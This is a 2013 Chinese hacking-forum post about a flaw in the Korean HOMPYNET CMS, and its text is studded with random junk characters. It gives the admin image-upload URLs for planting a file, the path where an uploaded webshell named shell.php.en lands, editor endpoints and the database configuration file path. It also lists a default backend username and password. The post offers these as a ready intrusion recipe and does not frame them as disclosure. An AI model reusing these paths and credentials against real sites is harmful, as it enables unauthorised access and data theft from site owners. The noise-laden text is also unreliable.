中国网络渗透测试联盟

标题: 韩国HOMPYNET CMS漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:12
标题: 韩国HOMPYNET CMS漏洞
上传漏洞  :
/ z4 y4 C- w! \( G2 C6 s: t  ?& z6 j/ F! E
http://www.xxx.com/admin/image_a ... p;iname=&iform=5 Q; Z3 Q( x; b+ K7 V6 `3 u
! a0 ?/ ?7 s/ c  w6 `8 Q2 n
http://www.xxx.com/admin/image_a ... p;iname=&iform=
6 o  e9 K$ A( f; r( U' S3 R( r/ a
+ B) f3 X* b9 [( x0 y/ h上传后路径:2 D, \9 z' F- A' U

) I7 ^9 A. n( s% I5 H5 ?( Phttp://www.xxx.com/bis_web_page/images/shell.php.en
; h/ Z* f( i" J" j" F# }
/ b' o& s: j, ~: {编辑器:
* F0 r! S0 u/ l6 a- J9 t& N7 w3 J7 ~& Y4 ?7 {
http://www.xxx.com/admin/editor/SWE.php: m) L6 _6 G  `3 h( ^0 [

' ^' p! q7 n5 U2 x8 o- vhttp://www.xxx.com/program/editor/SWE.php
& P) s# \* Z! L1 L* n: q1 L# m$ s, n& i% m7 L
数据配置文件路径:
* q+ o6 Z$ r- l" H+ i7 q; P: d% p3 [2 n1 q1 C+ w: ]0 M2 d$ j
http://www.xxx.com/m_config/DATA/g_setting.php
4 |2 D# E6 Z! J! g1 w" E! l) P  {2 s4 K1 R. S
此程序通用后台账号 :gamsiw  php999 v5 @9 k& ]& W! m9 f
# t: M  g# R/ S6 p; L2 V
3 Q' {5 P1 f3 a4 G  z! f$ u9 s
; w0 k# K! O) Y/ g  c/ w




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2